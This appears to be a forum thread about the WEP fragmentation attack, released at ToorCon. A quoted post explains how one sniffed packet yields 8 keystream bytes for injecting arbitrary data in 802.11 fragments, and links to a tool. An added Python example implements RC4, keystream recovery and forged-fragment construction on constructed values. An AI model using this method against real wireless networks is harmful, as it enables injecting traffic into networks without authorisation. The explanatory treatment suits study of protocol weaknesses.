Quote:
|
Originally Posted by sorbo
It is possible to send arbitrary data [any length and content] on a WEP network after having eavesdropped a single data packet.
http://darkircop.org/frag-0.1.tgz
The idea is:
Sniff first 8 bytes of cipher-text on packet with IV X.
XOR cipher-text with 8 bytes of clear-text:
AA AA 03 00 00 00 08 {00/06} depending if IP/ARP.
Send data in 802.11 fragments of 4 data bytes + 4 CRC32 bytes all encrypted using the PRGA recovered and with IV X.
|
I take it that this is what was released at ToorCon last week. Been looking forward to checking it out.
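The keystream recovery and fragment layout described in the quoted post, worked through on constructed bytes; this is an added example, not code from the thread or from the frag tool. The IV, the 40-bit key, the payload and all function names are assumptions made for the illustration, and the key is used only to build the captured frame and to play the receiver.

```python
import struct
import zlib

# LLC/SNAP header that opens a WEP-protected IP data frame (bytes from the post).
SNAP_IP = bytes.fromhex("aaaa030000000800")

def rc4(key: bytes, n: int) -> bytes:
    """Return the first n bytes of RC4 keystream for key."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(data))  # WEP ICV: CRC32, little-endian

def wep_encrypt(iv: bytes, key: bytes, payload: bytes) -> bytes:
    """WEP body: (payload || ICV) XOR RC4(iv || key)."""
    plain = payload + icv(payload)
    return xor(plain, rc4(iv + key, len(plain)))

def wep_decrypt(iv: bytes, key: bytes, body: bytes):
    """Receiver side: return the payload if the ICV verifies, else None."""
    plain = xor(body, rc4(iv + key, len(body)))
    return plain[:-4] if icv(plain[:-4]) == plain[-4:] else None

def recover_keystream(cipher_body: bytes) -> bytes:
    """First 8 keystream bytes: ciphertext XOR the known LLC/SNAP header."""
    return xor(cipher_body[:8], SNAP_IP)

def fragment_body(keystream8: bytes, data4: bytes) -> bytes:
    """One fragment: 4 data bytes + 4 ICV bytes under the recovered keystream."""
    return xor(data4 + icv(data4), keystream8)

# Constructed sample values, not taken from any real network.
IV, KEY = bytes.fromhex("010203"), bytes.fromhex("0badc0de42")
captured = wep_encrypt(IV, KEY, SNAP_IP + b"constructed payload")
ks = recover_keystream(captured)  # derived from the capture alone, no key
```

The receiver's ICV check passes for a fragment built from `ks`, which is why WEP provides no integrity once one frame has been observed. Every such fragment reuses IV X and carries only 4 data bytes, a pattern visible in a capture.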